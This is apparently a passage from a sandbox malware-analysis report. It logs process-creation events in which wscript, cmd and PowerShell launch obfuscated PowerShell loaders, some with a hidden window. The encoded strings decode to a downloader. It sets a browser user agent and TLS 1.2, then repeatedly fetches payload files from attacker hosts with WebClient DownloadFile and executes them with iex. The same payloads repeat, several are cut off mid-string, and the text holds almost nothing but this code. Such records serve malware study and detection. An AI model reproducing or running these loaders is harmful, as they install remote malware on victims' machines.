TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 